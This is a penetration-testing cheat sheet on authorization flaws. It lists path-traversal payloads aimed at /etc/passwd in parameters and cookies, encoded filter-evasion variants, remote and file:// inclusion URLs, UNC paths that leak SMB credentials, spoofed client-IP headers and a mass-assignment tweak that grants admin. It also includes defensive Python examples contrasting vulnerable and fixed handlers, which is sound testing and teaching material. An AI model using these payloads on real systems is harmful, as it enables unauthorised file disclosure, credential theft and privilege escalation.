# Authorization Testing

***

## Directory Traversal File Include (LFI)

### Input Vectors Enumeration

Checks to be performed:

* Are there request parameters which could be used for file-related operations?
* Are there unusual file extensions?
* Are there interesting variable names?
  * `http://example.com/getUserProfile.jsp?item=ikki.html`
  * `http://example.com/index.php?file=content`
  * `http://example.com/main.cgi?home=index.html`
* Is it possible to identify cookies used by the web application for the dynamic generation of pages or templates?
  * `Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower`
  * `Cookie: USER=1826cc8f:PSTYLE=GreenDotRed`

### Testing Techniques

```
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
```

For the cookies example:

```
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
```

It’s also possible to include files and scripts located on an external website:

```
http://example.com/index.php?file=http://www.owasp.org/malicioustxt
```

If protocols are accepted as arguments, as in the above example, it’s also possible to probe the local filesystem this way:

```
http://example.com/index.php?file=file:///etc/passwd
```

If protocols are accepted as arguments, as in the above examples, it’s also possible to probe local services and services on nearby hosts:

```
http://example.com/index.php?file=http://localhost:8080
http://example.com/index.php?file=http://192.168.0.2:9080
```

The following example shows how the source code of a CGI component can be disclosed without any path traversal characters, provided the included file sits in the same directory:

```
http://example.com/main.cgi?home=main.cgi
```

> **Tip:** It’s a common mistake by developers to not expect every form of encoding and therefore only do validation for basic encoded content. If at first the test string isn’t successful, try another encoding scheme.

Each operating system uses different characters as path separators:

* Unix-like OS:
  * root directory: `/`
  * directory separator: `/`
* Windows OS:
  * root directory: `<drive letter>:`
  * directory separator: `\` or `/`
* Classic macOS:
  * root directory: `<drive letter>:`
  * directory separator: `:`

We should take into account the following character encoding mechanisms:

* URL encoding and double URL encoding
  * `%2e%2e%2f` represents `../`
  * `%2e%2e/` represents `../`
  * `..%2f` represents `../`
  * `%2e%2e%5c` represents `..\`
  * `%2e%2e\` represents `..\`
  * `..%5c` represents `..\`
  * `%252e%252e%255c` represents `..\`
  * `..%255c` represents `..\` and so on.
* Unicode/UTF-8 Encoding (it only works in systems that are able to accept overlong UTF-8 sequences)
  * `..%c0%af` represents `../`
  * `..%c1%9c` represents `..\`
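The encodings above (and the `file://`, `http://localhost` and `main.cgi` cases earlier in this section) all defeat a filter that looks for a literal `../`. The following added example, which is not code from this page or from OWASP, puts such a naive filter beside a decode-normalize-confine check; `BASE_DIR`, `ALLOWED_EXT` and the function names are assumptions.

```python
import posixpath
import re
from typing import Optional
from urllib.parse import unquote_to_bytes

BASE_DIR = "/var/www/templates"   # assumed directory the include is confined to
ALLOWED_EXT = {".html", ".txt"}    # assumed allow-list; also refuses main.cgi-style source disclosure
MAX_DECODE_ROUNDS = 3              # unwraps double (and triple) URL encoding
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")   # file:, http:, c: ...

def naive_filter(value: str) -> bool:
    """The blocklist the Tip above warns about: it only sees a literal '../' or '..\\'."""
    return "../" not in value and "..\\" not in value

def fully_decode(value: str) -> Optional[str]:
    """URL-decode until stable, then require strict UTF-8 so overlong bytes (%c0%af) are refused."""
    raw = value.encode("utf-8")
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    try:
        return raw.decode("utf-8")    # b"\xc0\xaf" is not valid UTF-8 and raises here
    except UnicodeDecodeError:
        return None

def resolve_safely(value: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Return the confined absolute path, or None when the request must be refused."""
    text = fully_decode(value)
    if text is None or "\x00" in text:
        return None
    if SCHEME_RE.match(text):          # remote include, file:///, or a Windows drive letter
        return None
    text = text.replace("\\", "/")     # Windows accepts both separators; canonicalize to one
    if text.startswith("/"):           # absolute paths, including //server/share UNC forms
        return None
    if any(seg in ("..", ".", "") for seg in text.split("/")):
        return None                    # no parent/current-directory hops, no empty segments
    resolved = posixpath.normpath(posixpath.join(base_dir, text))
    if not resolved.startswith(base_dir.rstrip("/") + "/"):
        return None                    # belt and braces; on a real filesystem add os.path.realpath
    if posixpath.splitext(resolved)[1].lower() not in ALLOWED_EXT:
        return None
    return resolved
```

`naive_filter` returns True (passes) for every encoded payload listed above, while `resolve_safely` refuses them and only returns a path for plain names under `BASE_DIR`.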

There are other OS and application framework specific considerations as well. For instance, Windows is flexible in its parsing of file paths.

* Windows shell: Appending any of the following to paths used in a shell command results in no difference in function:
  * Angle brackets `<` and `>` at the end of the path
  * Double quotes (closed properly) at the end of the path
  * Extraneous current directory markers such as `./` or `.\`
  * Extraneous parent directory markers with arbitrary items that may or may not exist. All of the following refer to the same `file.txt`:
    * `file.txt`
    * `file.txt...`
    * `file.txt<spaces>`
    * `file.txt""""`
    * `file.txt<<<>>><`
    * `./././file.txt`
    * `nonexistant/../file.txt`

* **Windows API**: The following items are discarded when used in any shell command or API call where a string is taken as a filename:
  * periods
  * spaces
* **Windows UNC Filepaths**: Used to reference files on SMB shares. Sometimes, an application can be made to refer to files on a remote UNC filepath. If so, the Windows SMB server may send stored credentials to the attacker, which can be captured and cracked. These may also be used with a self-referential IP address or domain name to evade filters, or used to access files on SMB shares inaccessible to the attacker, but accessible from the web server.
  * `\\server_or_ip\path\to\file.abc`
  * `\\?\server_or_ip\path\to\file.abc`
* **Windows NT Device Namespace**: Used to refer to the Windows device namespace. Certain references will allow access to file systems using a different path.
  * May be equivalent to a drive letter such as `c:\`, or even a drive volume without an assigned letter: `\\.\GLOBALROOT\Device\HarddiskVolume1\`
  * Refers to the first disc drive on the machine: `\\.\CdRom0\`

## Bypassing Authorization Schema

### Horizontal Bypassing Authorization Schema

* Is it possible to access resources that should be accessible to a user that holds a different identity with the same role or privilege?
* Is it possible to operate functions on resources that should be accessible to a user that holds a different identity?

**For each role:**

1. Register or generate two users with identical privileges.
2. Establish and keep two different sessions active (one for each user).
3. For every request, change the relevant parameters and the session identifier from token one to token two and diagnose the responses for each token.
4. An application will be considered vulnerable if the responses are the same, contain the same private data, or indicate a successful operation on another user’s resources or data.

### Vertical Bypassing Authorization Schema

**For each role:**

1. Register a user.
2. Establish and maintain two different sessions based on the two different roles.
3. For every request, change the session identifier from the original to another role’s session identifier and evaluate the responses for each.
4. An application will be considered vulnerable if the weaker privileged session receives the same data, or the response indicates successful operations on higher privileged functions.
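The two procedures above reduce to one comparison: the same request replayed under another identity (same role) or a weaker role. The added example below, which is not code from this page, models an object-level endpoint and an admin-only function in vulnerable and fixed forms, plus the two replay checks; the sessions, profile data and function names are constructed.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Session:
    user_id: int
    role: str                      # "user" or "admin"

# Constructed sample data: two users with the same role, plus one admin.
PROFILES = {
    1: {"owner": 1, "email": "alice@example.invalid"},
    2: {"owner": 2, "email": "bob@example.invalid"},
}
ALICE, BOB, ADMIN = Session(1, "user"), Session(2, "user"), Session(99, "admin")

def get_profile_vulnerable(session, profile_id):
    """Authenticated? Then the id parameter is trusted as-is: horizontal bypass."""
    if session is None:
        return 401, None
    return 200, PROFILES.get(profile_id)

def get_profile_fixed(session, profile_id):
    """Ownership (or the admin role) is checked on the object the id resolves to."""
    if session is None:
        return 401, None
    profile = PROFILES.get(profile_id)
    if profile is None or (profile["owner"] != session.user_id and session.role != "admin"):
        return 404, None           # same answer as "no such profile", so ids are not enumerable
    return 200, profile

def list_profiles_vulnerable(session, _=None):
    """Admin-only function with no role check: vertical bypass."""
    if session is None:
        return 401, None
    return 200, list(PROFILES.values())

def list_profiles_fixed(session, _=None):
    """Role is enforced on the function itself, not only hidden from the UI."""
    if session is None or session.role != "admin":
        return 403, None
    return 200, list(PROFILES.values())

def horizontal_check(handler, session_a, session_b, resource_of_a):
    """Step 3 of the horizontal procedure: replay A's request with B's session."""
    status_a, body_a = handler(session_a, resource_of_a)
    status_b, body_b = handler(session_b, resource_of_a)
    return status_a == 200 and status_b == 200 and body_a == body_b   # True means vulnerable

def vertical_check(handler, strong_session, weak_session):
    """Step 3 of the vertical procedure: the weaker role replays the stronger role's request."""
    strong, weak = handler(strong_session), handler(weak_session)
    return strong[0] == 200 and weak == strong                        # True means vulnerable
```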

### Testing for Special Request Header Handling

Some applications support non-standard headers such as `X-Original-URL` or `X-Rewrite-URL` in order to allow overriding the target URL in requests with the one specified in the header value.

### Other Headers to Consider

* Headers:
  * `X-Forwarded-For`
  * `X-Forward-For`
  * `X-Remote-IP`
  * `X-Originating-IP`
  * `X-Remote-Addr`
  * `X-Client-IP`
* Values:
  * `127.0.0.1` (or anything in the `127.0.0.0/8` or `::1/128` address spaces)
  * `localhost`
  * Any [RFC1918](https://tools.ietf.org/html/rfc1918) address:
    * `10.0.0.0/8`
    * `172.16.0.0/12`
    * `192.168.0.0/16`
  * Link local addresses: `169.254.0.0/16`

> Note: Including a port element along with the address or hostname may also help bypass edge protections such as web application firewalls, etc. For example: `127.0.0.4:80`, `127.0.0.4:443`, `127.0.0.4:43982`

## Rails-extension

You can access the data in different formats by changing the extension in the URL, e.g. `/users/1` -> `/users/1.json` ([Reference](https://pentesterlab.com/exercises/autho_03/course)).

## ORM-Risk

Assuming the application has two levels of privilege, changing the parameters from `user[username]=admin&user[password]=lol` to `user[admin]=admin&user[password]=lol` could lead to access to the admin panel ([Reference and explanation](https://pentesterlab.com/exercises/autho_04/course)).
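The risk above comes from handing every submitted `user[...]` attribute straight to the model. The following added example, which is not code from this page or from the PentesterLab exercise, parses that bracketed form body and contrasts unfiltered assignment with an attribute allow-list; `PERMITTED`, the `User` stand-in and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl

PERMITTED = ("username", "password")   # assumed allow-list (the strong-parameters idea)

def nested_params(body: str) -> dict:
    """Parse user[username]=admin&user[admin]=1 into {"user": {"username": "admin", "admin": "1"}}."""
    out = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        match = re.fullmatch(r"(\w+)\[(\w+)\]", key)
        if match:
            out.setdefault(match.group(1), {})[match.group(2)] = value
        else:
            out[key] = value
    return out

class User:
    """Stand-in for an ORM model: any column name handed to the constructor is written."""
    admin = False                      # column default: ordinary users are not admins

    def __init__(self, **attrs):
        for name, value in attrs.items():
            setattr(self, name, value)

def create_user_vulnerable(body: str) -> User:
    """Everything under user[...] reaches the model, so user[admin]=admin sets the flag."""
    return User(**nested_params(body).get("user", {}))

def create_user_fixed(body: str) -> User:
    """Only permitted attributes are mass-assigned; admin can only be set by admin-only code."""
    attrs = nested_params(body).get("user", {})
    return User(**{k: v for k, v in attrs.items() if k in PERMITTED})
```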
